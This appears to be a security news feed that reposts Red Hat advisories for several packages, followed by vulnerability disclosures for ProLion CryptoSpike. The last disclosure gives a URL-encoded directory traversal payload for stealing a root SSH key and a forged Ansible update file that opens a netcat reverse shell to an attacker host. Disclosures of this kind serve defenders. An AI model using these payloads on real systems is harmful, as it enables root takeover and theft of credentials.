Red Hat Security Advisory 2023-7730-03 - An update for tracker-miners is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7730.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tracker-miners security updateAdvisory ID:        RHSA-2023:7730-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7730Issue date:         2023-12-12Revision:           03CVE Names:          CVE-2023-5557====================================================================Summary: An update for tracker-miners is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Tracker is a powerful desktop-neutral first class object database, tag/metadata database and search tool. This package contains various miners and metadata extractors for tracker.Security Fix(es):* tracker-miners: sandbox escape (CVE-2023-5557)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5557References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2243096

Red Hat Security Advisory 2023-7730-03

Red Hat Security Advisory 2023-7716-03 - An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7716.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: webkit2gtk3 security updateAdvisory ID:        RHSA-2023:7716-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7716Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-42917====================================================================Summary: An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.Security Fix(es):* webkitgtk: Arbitrary Remote Code Execution (CVE-2023-42917)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-42917References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2253058

Red Hat Security Advisory 2023-7716-03

Red Hat Security Advisory 2023-7715-03 - An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7715.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: webkit2gtk3 security updateAdvisory ID:        RHSA-2023:7715-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7715Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-42917====================================================================Summary: An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.Security Fix(es):* webkitgtk: Arbitrary Remote Code Execution (CVE-2023-42917)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-42917References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2253058

Red Hat Security Advisory 2023-7715-03

Red Hat Security Advisory 2023-7714-03 - An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8. Issues addressed include integer overflow and remote SQL injection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7714.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: postgresql:12 security update  
Advisory ID:        RHSA-2023:7714-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2023:7714  
Issue date:         2023-12-11  
Revision:           03  
CVE Names:          CVE-2023-5868  
====================================================================

Summary: 

An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

PostgreSQL is an advanced object-relational database management system (DBMS).

Security Fix(es):

* postgresql: Buffer overrun from integer overflow in array modification (CVE-2023-5869)

* postgresql: Memory disclosure in aggregate function calls (CVE-2023-5868)

* postgresql: extension script @substitutions@ within quoting allow SQL injection (CVE-2023-39417)

* postgresql: Role pg_signal_backend can signal certain superuser processes. (CVE-2023-5870)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5868

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2228111  
https://bugzilla.redhat.com/show_bug.cgi?id=2247168  
https://bugzilla.redhat.com/show_bug.cgi?id=2247169  
https://bugzilla.redhat.com/show_bug.cgi?id=2247170

Red Hat Security Advisory 2023-7714-03

Red Hat Security Advisory 2023-7713-03 - An update for tracker-miners is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7713.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tracker-miners security updateAdvisory ID:        RHSA-2023:7713-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7713Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-5557====================================================================Summary: An update for tracker-miners is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Tracker is a powerful desktop-neutral first class object database, tag/metadata database and search tool. This package contains various miners and metadata extractors for tracker.Security Fix(es):* tracker-miners: sandbox escape (CVE-2023-5557)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5557References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2243096

Red Hat Security Advisory 2023-7713-03

Red Hat Security Advisory 2023-7712-03 - An update for tracker-miners is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7712.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: tracker-miners security updateAdvisory ID:        RHSA-2023:7712-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7712Issue date:         2023-12-11Revision:           03CVE Names:          CVE-2023-5557====================================================================Summary: An update for tracker-miners is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Tracker is a powerful desktop-neutral first class object database, tag/metadata database and search tool. This package contains various miners and metadata extractors for tracker.Security Fix(es):* tracker-miners: sandbox escape (CVE-2023-5557)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5557References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2243096

Red Hat Security Advisory 2023-7712-03

In Red Hat Advanced Cluster Security (RHACS), it was found that some security related HTTP headers were missing, allowing an attacker to exploit this with a clickjacking attack. An attacker could exploit this by convincing a valid RHACS user to visit an attacker-controlled web page, that deceptively points to valid RHACS endpoints, hijacking the user's account permissions to perform other actions.

Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-09-18

Updated:

2023-09-18

**RHSA-2023:5206 - Security Advisory**

*   Overview
*   Updated Images

**Synopsis**

Moderate: RHACS 4.2 enhancement and security update

**Type/Severity**

Security Advisory: Moderate

**Topic**

Updated images are now available for Red Hat Advanced Cluster Security (RHACS).  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

The release of RHACS 4.2 provides these changes:  

Security Fix(es):  

*   stackrox: Missing HTTP security headers allows for clickjacking in web UI (CVE-2023-4958)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  

New Features  

RHACS 4.2 includes the following new features, improvements, and updates:  

Platform  

*   Bring your own PostgreSQL database for RHACS Central (Technology Preview)
*   The CORE BPF collection method is now GA
*   RHACS Product usage report
*   Performance improvements for the Compliance dashboard

Vulnerability management  

*   Vulnerability scanning support for Registry Mirrors in OpenShift Container Platform
*   Configure delegated image scanning in the RHACS portal
*   Define new system policies using CVE age or fixability
*   On-demand and downloadable CVE report in Vulnerability Management 2.0
*   Scanner supports additional operating systems

Network Security  

*   Improvements to runtime network policy generation
*   Build time Network Policy tools (Technology Preview)
*   New Listening Endpoints menu in the RHACS portal
*   Viewing network policy YAML files from a violation

For notable technical changes, deprecated and removed features, and bug fixes, see the Release Notes.

**Solution**

To take advantage of the new features, bug fixes, and enhancements in RHACS 4.2, you are advised to upgrade to RHACS 4.2.

**Affected Products**

*   Red Hat Advanced Cluster Security for Kubernetes 4 x86\_64
*   Red Hat Advanced Cluster Security for Kubernetes for IBM Z and LinuxONE 4 s390x
*   Red Hat Advanced Cluster Security for Kubernetes for IBM Power, little endian 4 ppc64le

**Fixes**

*   BZ - 1990363 - CVE-2023-4958 stackrox: Missing HTTP security headers allows for clickjacking in web UI
*   ROX-19688 - Release RHACS 4.2.0

**References**

*   https://access.redhat.com/security/updates/classification/#moderate
*   https://docs.openshift.com/acs/4.2/release\_notes/42-release-notes.html

**ppc64le**

advanced-cluster-security/rhacs-central-db-rhel8@sha256:a6f0560462f70d081ecd633dab7fe3812a9a05ede057dcfc85c78aebcbfcf7fb

advanced-cluster-security/rhacs-collector-rhel8@sha256:daec224b2d21db1d0f896c376bc57896f3d322699ea860c9af3daeb0fdf60c26

advanced-cluster-security/rhacs-collector-slim-rhel8@sha256:99cea72009375b9fe0d351d2dc74d0b08f303daf8fd3d054f34301b2a7b9874e

advanced-cluster-security/rhacs-main-rhel8@sha256:e6cd211b07ec198e643043636bc43e32128a99a455594986f54d01f909eb97e1

advanced-cluster-security/rhacs-operator-bundle@sha256:e2262de639260486a1942d9c7a8be075a96888519c65b0ccd41f1360978300ac

advanced-cluster-security/rhacs-rhel8-operator@sha256:fa7fd49bfc458b712c26f122e22520e685b036dcf65c204f7b6385cd53cdc9b3

advanced-cluster-security/rhacs-roxctl-rhel8@sha256:b3faa186bd4e7d7949314abb298b67fec93eba13c9028b2d597141f3ecfadaa8

advanced-cluster-security/rhacs-scanner-db-rhel8@sha256:0a8010cccaa062270ae1c2214a46ebedbf9dd55caa848d2063ade69eed1cefcf

advanced-cluster-security/rhacs-scanner-db-slim-rhel8@sha256:0bd96c2875a801820c1a042b854c903b7ff7f577f286d1b42688d084f4ac369b

advanced-cluster-security/rhacs-scanner-rhel8@sha256:491b67f1b2930996a975fe3b4088020538c78db6f3060447699795a30e74b54b

advanced-cluster-security/rhacs-scanner-slim-rhel8@sha256:df0d1098be46a3b4ab9374a3eff318410a955f014961b08ecaf416e9535f005a

**s390x**

advanced-cluster-security/rhacs-central-db-rhel8@sha256:655da98b70cce7d0d8eda8c8d13d13e4abb56d240a7dcc86c9a1ecf74524095f

advanced-cluster-security/rhacs-collector-rhel8@sha256:7d6b22c16ffc10dbe11d5d783e1c7efa7f39de054a3a2332c807bdf63bcd1c71

advanced-cluster-security/rhacs-collector-slim-rhel8@sha256:7cd77dd8ba37e7df2802ef44bda69e4305631729c981a673a0a31433f4d05663

advanced-cluster-security/rhacs-main-rhel8@sha256:64bef5c27321ed50c11018b32ae4d5de3490ad744a0f08e8e724432c75ffa775

advanced-cluster-security/rhacs-operator-bundle@sha256:85b9f7b20c8ad9552c30f6aaf772ceb5342bcf6ea90ea997eb614212fa57ed58

advanced-cluster-security/rhacs-rhel8-operator@sha256:d80fafb9e7fcd0fa9e4103ae929cfa9dc8b91851b50d17d377d8fbdf2dd0884f

advanced-cluster-security/rhacs-roxctl-rhel8@sha256:c0cad154a2b2b90bf1ad022bfbc1edaee1d0d3ebbae99c296afbc4e423d49adc

advanced-cluster-security/rhacs-scanner-db-rhel8@sha256:6c9a79f505c45e604b51ce9d29a7472e23da6f33011635afcac5dc96d3c8a413

advanced-cluster-security/rhacs-scanner-db-slim-rhel8@sha256:bc4c81fc092d4bffca4742030a197b79bc80565dc4d677d7344a7d91e592e735

advanced-cluster-security/rhacs-scanner-rhel8@sha256:d4efaf6561a45aa575870b3aefcc72838618ff411fdf4d8b6c23c92598400f44

advanced-cluster-security/rhacs-scanner-slim-rhel8@sha256:e9327bd5ebfcec5ec7c76d6e47be8dfe5fc48913859a36bb9d9ddafbc11b53fe

**x86\_64**

advanced-cluster-security/rhacs-central-db-rhel8@sha256:d53ebe7252d7414e0dc756d48d806504993d43f8c3de2eebed0e1f74749cd2de

advanced-cluster-security/rhacs-collector-rhel8@sha256:11ba7bb24a938e34ca077b77730cd1524dee6d81157b7309b0725bde1dc1a658

advanced-cluster-security/rhacs-collector-slim-rhel8@sha256:8844ee1cf02d8038e8b156bc856f3f6bbe1cdca160ec79f30da39ef826d897f2

advanced-cluster-security/rhacs-main-rhel8@sha256:301a89cdc5a6aa6cc807851082a0ed58580547098c8fe35e000fe54ecbefcd1e

advanced-cluster-security/rhacs-operator-bundle@sha256:de3b2e28150c6428864fe8dd7ef325b806bc9e9881d883ba3335e00b6593618c

advanced-cluster-security/rhacs-rhel8-operator@sha256:696ef8ccb59d3f34a640ffdc18b089680a2a28189b388450080454865ce5b12e

advanced-cluster-security/rhacs-roxctl-rhel8@sha256:61efe4f465be5ac4c3ddf6a5c452d5dc7d250b8a842ec36b7cf44272de146e15

advanced-cluster-security/rhacs-scanner-db-rhel8@sha256:4f5bc6377f8b81ca0f0bebfd4cafdc7d17029e702861f7159a38bccc3e7a21c3

advanced-cluster-security/rhacs-scanner-db-slim-rhel8@sha256:1971e8fe13c51e6be8dd497b8ca99c8282425a6cd9735771ab6fd39a11616086

advanced-cluster-security/rhacs-scanner-rhel8@sha256:756151367af2d9ee8ba0ad7537c17841f800c2828f440baa6d73b5a071d29638

advanced-cluster-security/rhacs-scanner-slim-rhel8@sha256:97e5a3c6af61067119e6b6d7fd46b64569f06e311c21596af430e648b237b59b

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

CVE-2023-4958

A Huawei data communication product has a command injection vulnerability. Successful exploitation of this vulnerability may allow attackers to gain higher privileges.

CVE-2022-48616: Huawei NetEngine AR617VW Authenticated Root RaCE

Directory traversal in the log-download REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to download host server SSH private keys (associated with a Linux root user) by injecting paths inside REST API endpoint parameters.

Directory traversal in the log-download REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to download host server SSH private keys (associated with a Linux root user) by injecting paths inside REST API endpoint parameters.  
 

**Introduction**

CryptoSpike allows operators to download logs from the system through a dedicated section of the web management interface. In order to download logs, the web application leverages a REST API endpoint that is vulnerable to Directory Traversal when using as parameter a traversal path (i.e. containing "../"), thus also allowing a malicious user to access confidential data not intended to be downloaded (e.g. private SSH keys that can be used to access all system host servers with highest privileges).

**Steps to reproduce**

To consume the vulnerable REST API endpoint, a valid JWT Bearer Token belonging to a CryptoSpike user is required. For the invocation to succeed, it is required the operator only having a role with the "Logs / DOWNLOAD" permission set to READ.

The REST API endpoint is named /logs/:filename under the "API-Gateway" service on the leader node (https://leaderhostname/api/v1/Server/logs/:filename) and will be invoked using a GET http request.

Specifying a nonexistent filename as :filename parameter will lead the system to return a low level error message containing the absolute path of the required file, thus revealing the potential directory traversal vulnerability on the endpoint:

In order to confirm this, it is possible to send another request with the same filename but with relative path (input string "../downloads/NONEXISTENT" with URL encoding on all special characters), resulting in the same error message, with the same absolute path specified:

This confirms that the API is vulnerable to Directory Traversal attacks. Moreover, by analyzing the relevant Docker container filesystem being accessible via directory traversal, a sensitive file containing an unprotected SSH private key (input string "../../ssh/update_key" URL encoded as %2E%2E%2F%2E%2E%2Fssh%2Fupdate%5Fkey) has been detected, accessible via directory traversal:

By using this private key with an SSH command line client to connect to the host servers of CryptoSpike infrastructure (in the testing environment one Leader server and two Agent servers), the connection is correctly established without inputting a password and a remote shell is obtained as a user with the root privileges:

CVE-2023-36654: CVCN

A missing integrity check in the update system in ProLion CryptoSpike 3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages.

A missing integrity check in the update system in ProLion CryptoSpike3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages  
 

**Introduction**

The CryptoSpike system provides an update function that can work both in online mode when the server has Internet access, and in offline mode. In the latter case, the software update is performed by uploading in CryptoSpike the update packages released by the vendor in the form of archive files. The operation can be performed through a special section on the management interface or, in alternative, though REST APIs.

It has been verified that the update system in offline mode is unsecure because no authenticity and integrity checks are performed on the update packages released by the vendor, hence a malicious actor can forge the packages before they are loaded on the system. Consequently, it is possible to specify a series of operating system commands inside the update files, that will be executed on all the nodes of the system (leader and agents) with root privileges.

**Steps to reproduce**

Connect to the Cryptospike web management interface (on the Leader node) with an identity having a role including the “Update” permission set to MODIFY, access the “System”, “Update” section where it is possible to upload updates in .tgz format.

The malicious actor modifies an existing update package or prepares one similar to the one expected from the product (i.e., an Ansible descriptor in YAML format, with setup.yml name inside a directory named "bundle") containing two malicious commands, the first one will write a file inside the /tmp/ directory on the filesystem and the second one will open a reverse shell towards an attacker machine:

\---
- name: Hacked script
  hosts: all
  become: yes
  vars:
    # product information
    product\_name: "Product"
    product\_version: "V0.0.0"
    # base directory where the bundle files are located
    target\_dir: "/prolion/packages"
    log\_dir: "/prolion/logs"
    log\_file\_name: "update\_os.log"

  tasks:
    - name: "create a file"
      shell: "echo HACKED > /tmp/HACKED.txt"

    - name: "execute reverse shell"
      shell: "nc \[REDACTED IP\].230 1234 -e /bin/sh" 

On the attacker machine a _netcat_ has been launched in advance in listening mode on the same port specified in the commands inside the update bundle file as in the source above:

After some moments, the Ansible tasks are correctly executed by the update subsystem with root privileges, as shown in the picture below, where the obtained reverse shell allows to verify the root privileges of the running user on the host server (the leader host node, not the container node) and a file owned by root has been written inside /tmp/ directory on the filesystem.

It has also been verified that the Ansible tasks can be run on all the infrastructure nodes (Leader and Agent nodes) and without prior checks on the .tgz archive contents, thus allowing _"zip bomb"_ attacks that would cause a complete crash of the system.

Tag

#linux